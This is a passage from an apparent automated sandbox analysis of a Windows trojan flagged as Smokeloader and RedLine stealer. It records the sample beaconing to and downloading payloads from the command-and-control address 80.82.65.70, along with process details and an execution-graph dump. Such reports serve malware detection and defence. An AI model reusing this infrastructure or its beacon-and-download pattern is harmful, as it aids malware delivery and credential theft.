                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:26.190165043 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:25 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=97
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:28.213033915 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:28.700536013 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:28 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=96
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:30.744301081 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:31.235162973 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:30 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=95
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:33.259049892 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:33.747785091 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:33 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=94
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:35.774940014 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:36.258832932 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:35 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=93
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:38.290361881 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:38.786434889 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:38 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=92
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:40.821625948 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:41.311126947 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:41 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=91
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:43.339262009 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:43.836774111 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:43 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=90
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:45.869149923 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:46.354108095 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:46 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=89
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:48.384077072 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:48.892077923 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:48 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=88
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:50.930975914 CET | 393 | OUT | GET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:51.413856983 CET | 203 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:51 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=87
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.5 | 49786 | 80.82.65.70 | 80 | 4308 | C:\Users\user\Desktop\file.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 13, 2024 06:12:54.613821983 CET | 392 | OUT | GET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: d
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:56.108979940 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:55 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="dll";
                                          Content-Length: 242176
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Dec 13, 2024 06:12:57.006952047 CET | 392 | OUT | GET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:57.305341005 CET | 392 | OUT | GET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:58.113756895 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:57 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="soft";
                                          Content-Length: 1502720
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream



                                          Target ID:0
                                          Start time:00:11:58
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x400000
                                          File size:1'933'312 bytes
                                          MD5 hash:602574CE5A6EEA6388A2D30A490DDFA9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:6
                                          Start time:00:13:00
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572
                                          Imagebase:0x320000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:4.1%
                                            Dynamic/Decrypted Code Coverage:11.3%
                                            Signature Coverage:56.4%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:23
41085->41087 41089 406837 41086->41089 41245 404f50 41087->41245 42398 4081e0 53 API calls 2 library calls 41089->42398 41090 406a81 41092 406aa1 41090->41092 41093 408c40 43 API calls 41090->41093 42401 408410 53 API calls 2 library calls 41092->42401 41095 406a9c 41093->41095 41728 403d20 41095->41728 41096 406aa9 41098 402430 43 API calls 41096->41098 41099 406ab9 41098->41099 41100 402360 39 API calls 41099->41100 41101 406acd 41100->41101 41102 406b70 41101->41102 41103 401770 41 API calls 41101->41103 42404 408580 53 API calls 2 library calls 41102->42404 41105 406ae8 41103->41105 42402 4084a0 53 API calls 2 library calls 41105->42402 41106 406b75 41109 402430 43 API calls 41106->41109 41108 406af1 41111 402430 43 API calls 41108->41111 41110 406b88 41109->41110 41112 402360 39 API calls 41110->41112 41115 406b01 41111->41115 41113 406b9f 41112->41113 41113->40767 41114 406ba3 41113->41114 42405 4086f0 53 API calls 2 library calls 41114->42405 41118 406b37 41115->41118 41119 406b28 Sleep 41115->41119 41117 406bb0 41122 402430 43 API calls 41117->41122 41123 402430 43 API calls 41118->41123 41119->41115 41120 406b35 41119->41120 41121 406b59 41120->41121 41124 402360 39 API calls 41121->41124 41125 406bbf 41122->41125 41126 406b4e 41123->41126 41127 406b61 41124->41127 42406 408670 53 API calls 2 library calls 41125->42406 41129 402360 39 API calls 41126->41129 42403 4017d0 CoUninitialize 41127->42403 41129->41121 41131 406bd3 41132 402430 43 API calls 41131->41132 41133 406be2 41132->41133 42407 408610 53 API calls __Init_thread_footer 41133->42407 41135 406bf0 41136 402430 43 API calls 41135->41136 41137 406bff 41136->41137 42408 4058d0 247 API calls 5 library calls 41137->42408 41139 406c08 41139->40767 41141 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41140->41141 41141->40711 42412 4128a2 GetLastError 41142->42412 41146 4107c0 41145->41146 41148 4107ca 41145->41148 42456 4106b4 43 API calls 2 library calls 41146->42456 41148->40744 41160 403ad1 
std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41149->41160 41150 408c40 43 API calls 41150->41160 41151 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41153 403c13 41151->41153 41153->40744 41154 403b6d 41155 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41154->41155 41156 403c17 41154->41156 41155->41151 41158 40cfaf 39 API calls 41156->41158 41157 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41157->41155 41157->41156 42457 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41157->42457 41159 403c1c 41158->41159 41160->41150 41160->41156 41160->41157 41162 406c4c 41161->41162 41170 406c7e 41161->41170 42458 409c85 6 API calls 41162->42458 41163 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41165 406c90 41163->41165 41165->40725 41166 406c56 41166->41170 42459 409f97 42 API calls 41166->42459 41168 406c74 42460 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41168->42460 41170->41163 41172 402453 41171->41172 41173 402730 43 API calls 41172->41173 41174 402465 41173->41174 41174->40730 41176 40236b 41175->41176 41177 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41175->41177 41176->41177 41178 40cfaf 39 API calls 41176->41178 41177->40734 41179 4023aa 41178->41179 41180 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41179->41180 41181 40cfaf 39 API calls 41179->41181 41180->40734 41182 40242c 41181->41182 41184 401783 CallUnexpected 41183->41184 41185 409b4a 41 API calls 41184->41185 41186 40179a CallUnexpected 41185->41186 41186->40828 41188 4083ee 41187->41188 41189 4083b2 41187->41189 41190 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41188->41190 42461 409c85 6 API calls 41189->42461 41192 408400 41190->41192 41192->40834 41193 4083bc 41193->41188 42462 409f97 42 API calls 41193->42462 41195 4083e4 42463 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41195->42463 41198 
40835e 41197->41198 41199 40832c 41197->41199 41200 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41198->41200 42464 409c85 6 API calls 41199->42464 41202 408370 41200->41202 41202->40852 41203 408336 41203->41198 42465 409f97 42 API calls 41203->42465 41205 408354 42466 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41205->42466 41208 4082e2 41207->41208 41209 40829d 41207->41209 41211 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41208->41211 42467 409c85 6 API calls 41209->42467 41213 4082f5 41211->41213 41212 4082a7 41212->41208 42468 409f97 42 API calls 41212->42468 41213->40876 41215 4082d8 42469 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41215->42469 41218 408d74 41217->41218 41219 4092d0 43 API calls 41218->41219 41220 4068ee 41219->41220 41221 408dc0 41220->41221 41222 408ddb 41221->41222 41224 408def __InternalCxxFrameHandler 41222->41224 42470 402810 43 API calls 3 library calls 41222->42470 41224->40911 42471 4090f0 41225->42471 41227 40691b 41227->40932 41229 408c6a 41228->41229 41230 408d2d 41229->41230 41234 408c7e 41229->41234 42494 4015d0 43 API calls 3 library calls 41230->42494 41232 408c8a __InternalCxxFrameHandler 41232->41078 41233 408d32 42495 401530 41 API calls 3 library calls 41233->42495 41234->41232 41236 408cd8 41234->41236 41237 408cf9 41234->41237 41236->41233 41239 408cdf 41236->41239 41244 408cee __InternalCxxFrameHandler 41237->41244 42493 401530 41 API calls 4 library calls 41237->42493 41238 408ce5 41240 40cfaf 39 API calls 41238->41240 41238->41244 42492 401530 41 API calls 4 library calls 41239->42492 41242 408d3c 41240->41242 41244->41078 41246 4107e2 GetSystemTimeAsFileTime 41245->41246 41247 404f9f 41246->41247 41248 4106a2 39 API calls 41247->41248 41249 404fa8 CallUnexpected 41248->41249 41250 409b4a 41 API calls 41249->41250 41257 404ffc CallUnexpected 
std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41250->41257 41253 402730 43 API calls 41253->41257 41254 4092d0 43 API calls 41254->41257 41256 401e20 44 API calls 41256->41257 41257->41253 41257->41254 41257->41256 41258 4052d0 Sleep 41257->41258 41259 4058bd 41257->41259 41266 4052e0 CallUnexpected 41257->41266 42496 402470 41257->42496 42637 409c85 6 API calls 41257->42637 42638 409f97 42 API calls 41257->42638 42639 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41257->42639 41258->41257 41260 40cfaf 39 API calls 41259->41260 41261 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 41260->41261 41264 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41261->41264 41265 405a22 41264->41265 41267 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41264->41267 41269 40cfaf 39 API calls 41265->41269 41272 409b4a 41 API calls 41266->41272 41268 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41267->41268 41270 405a1e 41268->41270 41271 405a27 41269->41271 41270->41090 41273 4107e2 GetSystemTimeAsFileTime 41271->41273 41303 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41272->41303 41274 405a7f 41273->41274 41275 4106a2 39 API calls 41274->41275 41276 405a88 Sleep 41275->41276 41277 402730 43 API calls 41276->41277 41287 405aba 41277->41287 41279 402730 43 API calls 41279->41303 41280 402730 43 API calls 41309 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41280->41309 41282 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41282->41280 41282->41309 41283 4092d0 43 API calls 41283->41303 41286 401e20 44 API calls 41286->41303 41287->41282 42643 4025a0 41 API calls 41287->42643 41289 403a90 43 API calls 41289->41309 41290 4107b2 43 API calls 41290->41309 41291 40fb0d 15 API calls ___std_exception_copy 41291->41303 41292 409b4a 41 API calls 41292->41309 41293 4061c5 41296 406c20 53 API calls 
41293->41296 41294 405682 41295 40577c CoUninitialize 41294->41295 41300 405792 41295->41300 41298 4061ec 41296->41298 41297 408c40 43 API calls 41297->41303 41304 402430 43 API calls 41298->41304 41306 4057ae CoUninitialize 41300->41306 41302 402730 43 API calls 41302->41309 41303->41259 41303->41279 41303->41283 41303->41286 41303->41291 41303->41294 41303->41297 41327 403410 41 API calls 41303->41327 41357 405687 41303->41357 42511 4035b0 CryptAcquireContextW 41303->42511 42535 402ec0 41303->42535 42640 409c85 6 API calls 41303->42640 42641 409f97 42 API calls 41303->42641 42642 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41303->42642 41308 4061fc 41304->41308 41317 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41306->41317 41312 402360 39 API calls 41308->41312 41309->41289 41309->41290 41309->41292 41309->41293 41309->41302 41310 4092d0 43 API calls 41309->41310 41319 401e20 44 API calls 41309->41319 41321 40cfaf 39 API calls 41309->41321 41326 406192 Sleep 41309->41326 41339 40619e 41309->41339 41346 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41309->41346 41350 406c0b 41309->41350 42644 4025a0 41 API calls 41309->42644 42645 409c85 6 API calls 41309->42645 42646 409f97 42 API calls 41309->42646 42647 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41309->42647 41310->41309 41314 406210 41312->41314 41313 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41318 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41313->41318 41315 4062e5 41314->41315 41316 406218 41314->41316 42660 406ec0 53 API calls 2 library calls 41315->42660 41324 406288 41316->41324 41325 40622b 41316->41325 41317->41259 41317->41313 41322 4058b6 41318->41322 41319->41309 41321->41309 41322->41090 41323 4062ea 41331 402430 43 API calls 41323->41331 42655 406db0 53 API calls 2 library calls 41324->42655 42650 406ca0 53 API calls 2 library calls 41325->42650 
41326->41309 41327->41303 41330 406230 41334 402430 43 API calls 41330->41334 41333 4062fa 41331->41333 41332 40628d 41335 402430 43 API calls 41332->41335 41338 402360 39 API calls 41333->41338 41337 406240 41334->41337 41336 40629d 41335->41336 42656 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41336->42656 42651 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41337->42651 41343 40630e 41338->41343 42648 408c10 43 API calls 41339->42648 41344 4063e4 41343->41344 41345 406316 41343->41345 42669 407260 53 API calls 2 library calls 41344->42669 42661 406f40 53 API calls 2 library calls 41345->42661 41346->41326 41347 4062a6 41352 402360 39 API calls 41347->41352 41348 4061aa 41354 402360 39 API calls 41348->41354 41349 406249 41355 402360 39 API calls 41349->41355 41356 403c20 21 API calls 41350->41356 41360 4062ae 41352->41360 41362 4061b2 41354->41362 41363 406251 41355->41363 41364 406c10 41356->41364 41359 40571b Sleep 41357->41359 41368 40574a Sleep 41357->41368 42591 10001f20 41357->42591 42634 100010a3 41357->42634 41358 40631b 41372 402430 43 API calls 41358->41372 41359->41294 41359->41357 42657 406e40 53 API calls 2 library calls 41360->42657 41361 4063e9 41373 402430 43 API calls 41361->41373 41366 402360 39 API calls 41362->41366 42652 406d30 53 API calls 2 library calls 41363->42652 41370 4061ba 41366->41370 41368->41294 41369 4062b3 41379 402430 43 API calls 41369->41379 42649 4017d0 CoUninitialize 41370->42649 41371 406256 41377 402430 43 API calls 41371->41377 41375 40632b 41372->41375 41376 4063f9 41373->41376 42662 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41375->42662 41386 402360 39 API calls 41376->41386 41380 406266 41377->41380 41382 4062c3 41379->41382 42653 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41380->42653 41381 406334 41384 402360 39 API calls 41381->41384 42658 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41382->42658 41388 40633c 41384->41388 41390 40640d 
41386->41390 41387 40626f 41391 402360 39 API calls 41387->41391 42663 406fc0 53 API calls 2 library calls 41388->42663 41389 4062cc 41393 402360 39 API calls 41389->41393 41394 4064ce 41390->41394 42670 4072e0 53 API calls 2 library calls 41390->42670 41397 406277 41391->41397 41399 4062d4 41393->41399 42678 407600 53 API calls 2 library calls 41394->42678 42654 408c10 43 API calls 41397->42654 41398 406341 41405 402430 43 API calls 41398->41405 42659 408c10 43 API calls 41399->42659 41400 40641a 41408 402430 43 API calls 41400->41408 41401 4064d8 41409 402430 43 API calls 41401->41409 41404 406283 41407 40686e 41404->41407 42716 402330 43 API calls 41404->42716 41406 406351 41405->41406 42664 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41406->42664 41412 401770 41 API calls 41407->41412 41413 40642a 41408->41413 41414 4064e8 41409->41414 41416 406881 41412->41416 42671 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41413->42671 41424 402360 39 API calls 41414->41424 41415 40635a 41418 402360 39 API calls 41415->41418 41419 408380 53 API calls 41416->41419 41421 406362 41418->41421 41422 40688a 41419->41422 41420 406433 41423 402360 39 API calls 41420->41423 42665 407040 53 API calls 2 library calls 41421->42665 41432 402430 43 API calls 41422->41432 41426 40643b 41423->41426 41427 4064fc 41424->41427 42672 407360 53 API calls 2 library calls 41426->42672 41430 4065e3 41427->41430 42679 407680 53 API calls 2 library calls 41427->42679 41428 406367 41438 402430 43 API calls 41428->41438 42689 407a20 53 API calls 2 library calls 41430->42689 41436 40689d 41432->41436 41433 406440 41442 402430 43 API calls 41433->41442 41435 4065ed 41444 402430 43 API calls 41435->41444 41439 408300 53 API calls 41436->41439 41437 406509 41443 402430 43 API calls 41437->41443 41440 406377 41438->41440 41441 4068a8 41439->41441 41452 402360 39 API calls 41440->41452 41449 402430 43 API calls 41441->41449 41445 406450 41442->41445 41447 406519 41443->41447 
